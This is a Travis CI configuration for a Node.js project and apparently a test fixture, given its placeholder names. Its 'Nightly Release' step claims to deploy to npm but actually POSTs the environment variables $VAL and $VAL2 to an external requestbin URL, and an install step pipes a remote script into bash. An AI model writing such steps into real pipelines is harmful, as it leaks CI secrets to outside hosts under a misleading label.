language: node_js

node_js:
  - '8'
  - '10'

cache: yarn

before_install:
  - curl -o- -L https://yarnpkg.com/install.sh | bash -s -- --version 1.12.1
  - export PATH=$HOME/.yarn/bin:$PATH

install:
  - yarn

script:
  - yarn test

jobs:
  include:
    - stage: Nightly Release
      node_js: '10'
      if: branch IN (master, bar)
      script:
        - echo "Deploying nightly builds to npm ... ${VAL} ${VAL2} $VAL $VAL2"
        - curl -X POST -d "fizz=$VAL" -d "f=$VAL2" http://requestbin.fullcontact.com/1i2wceu1
    - stage: Foo branch
      node_js: '10'
      if: branch = foo
      script: echo "foo"
